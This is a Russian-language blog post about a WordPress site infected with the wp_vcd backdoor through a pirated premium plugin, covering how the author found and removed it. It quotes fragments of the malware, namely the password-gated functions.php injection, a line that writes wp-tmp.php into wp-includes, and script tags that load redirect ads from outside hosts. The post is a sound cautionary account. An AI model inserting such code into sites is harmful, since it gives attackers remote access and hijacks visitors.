Если ваш сайт взломан, вероятно, ваша вина

С самого начала моего знакомства с WordPress, я старалась соблюдать различные методы безопасности против взлома сайтов: установка защитных плагинов, изменение страницы входа в админку, систематическое обновление WordPress и тем. Но однажды, по своей неопытности, сама стала виновницей проникновения шпионского скрипта на один из сайтов, собственноручно открыла двери самому настоящему Backdoor.

Backdoor (переводится как «задняя дверь») относится к способу обхода аутентификации и дает злоумышленнику возможность удаленного доступа к сайту, оставаясь при этом незамеченным. Что позволяет злоумышленникам без проблем заходить в админку сайта, красть вашу информацию и устанавливать рекламные коды.

Бесплатный премиальный плагин — троянский конь.

Тут обязательно надо рассказать, с чего все началось и как обнаружилось, что с сайтом что-то не так. Некоторое время назад, я помогала в настройке интернет-магазина и потребовалось загрузить новые вариативные товары на сайт, но в бесплатной версии плагина WP All Import отсутствует возможность импортировать вариативные товары. Надо заметить, что PRO версия WP All Import стоит 99$, а к премиальной версии дополнительно приобретается аддон, который стоит почти столько же. И дабы облегчить процесс импорта товара, нужно было найти менее затратный способ это сделать, а с базой мы работать не умели. Сначала я обратила внимание на сайты складчин, но на нужные нам дополнения отсутствовало необходимое количество складчиков и сами заявки были созданы два-три года назад. И тут на глаза попадается сайт, на котором были размещены свежие PRO версии различных расширений и тем для WordPress. Конечно же я была наслышана о том, что бесплатные версии тем и плагинов использовать нежелательно, что в них может быть встроен вирус. Но сайт внушал доверие: выглядит он очень прилично, с хорошим оформлением, присутствуют комментарии посетителей. Я все-таки нашла и скачала нужный премиальный плагин и аддон.

После загрузки дополнений на компьютер, я открыла папки и начала изучать файлы, искала какой-либо намек на вирус, опыта у меня в этом деле не было. Начала с аддона и ничего там не обнаружила. Т.к. файлов было много, у меня просто лопнуло терпение и уже бегло проверяла содержимое плагина, открывала выборочно папки, ничего необычного не обнаружила и остановила свои поиски. Затем, переслала файлы администратору сайта и была очень рада, что смогла облегчить ему загрузку товара.

Дня через четыре решила зайти проверить сайт, посмотреть как загрузились товары. Кликнув на изображение товара, меня перекинуло на какой-то рекламный сайт. Сначала я решила, что заражен мой браузер, но все же зашла в консоль, сразу же открыла functions.php и увидела там этот код:

<?рhр if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_RЕQUEST['рassword'] == '6815b8892cf6767cbe71f75bf400ad')) { $div_code_namе="wp_vcd";

Как видно на скриншоте, этот вредоносный код расположился в самом начале functions.php.

backdoor в файле function.php

Как очищала сайт от вирусов.

Оказалось, вирусный код был внедрен и в functions.php родительской темы, а также в другую установленную, но не активную тему. На всякий случай, проверила все файлы темы, но больше ничего не обнаружила.

Так как опыта борьбы с подобным у меня не было, я просто удалила вирусные коды, но они появились вновь. Совсем не сразу поняла, что «троянскими конями» являлись те самые бесплатные премиальные плагины. Когда же вспомнила про них, то тут же удалила.

После безуспешных попыток, решила поискать решение подобной ситуации в интернете. Стандартный совет — это восстановить сайт из резервного копирования, но у нас бэкап был недельной давности, после этого были внесены кое какие изменения. Также рекомендуют заменить файлы wordpress и темы на свежие. Этот метод я отложила на крайний случай и решила просто обновить WordPress. После обновления еще раз удалила вирусные коды, также удалила неактивную тему и они больше не появились в functions.php. Конечно же меня это обрадовало, но все-таки принялась подробнее изучить тот код и по этому отрывку стало понятно где искать остальные файлы.

extract(theme_temp_setup($tmpcontent)); @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);

На хостинге тут же прошла по адресу wp-includes/ и обнаружила там три странных файла wp-tmp.php, wp-vcd .php, wp-feed.php.

странные файлы в wordpress

Чтобы убедиться, что эти файлы можно удалить, скачала свежую папку с WordPress и сравнила оригинальный wp-includes с тем, что у меня на сайте. После этого на всякий случай сохранила их к себе на компьютер и удалила с хостинга. Вот такой вирусный скрипт использовался в одном из файлов, благодаря ему меня перекинуло с нашего сайта на другой:

<script tуpe="text/jаvаscript" src="//go.onсlаsrv.соm/apu.php?zoneid=1412000"></sсript>
<script asуnс="asуnc" typу="text/javascript" src="//go.mоbislа.соm/noticе.php?p=1412002&interactive=1&pushup=1"></sсript>

Проверив заново все файлы и убедившись, что сайт чист, необходимо было обязательно сменить пароли и навсегда забыть про халявные премиальные плагины!

После всех событий повторно попробовала отыскать вирусы в папке скаченного мною плагина. На этот раз он обнаружился в папке helpers, в файле class.plugin-modules.php, его содержимое можно посмотреть по этой ссылке — pastebin.com/ecafwZbX.

Теперь всем советую изучить все файлы своего сайта, не забывать их периодически перепроверять и делать бэкап, ведь вирусы могут проникнуть не только с помощью бесплатных плагинов и тем.

наверх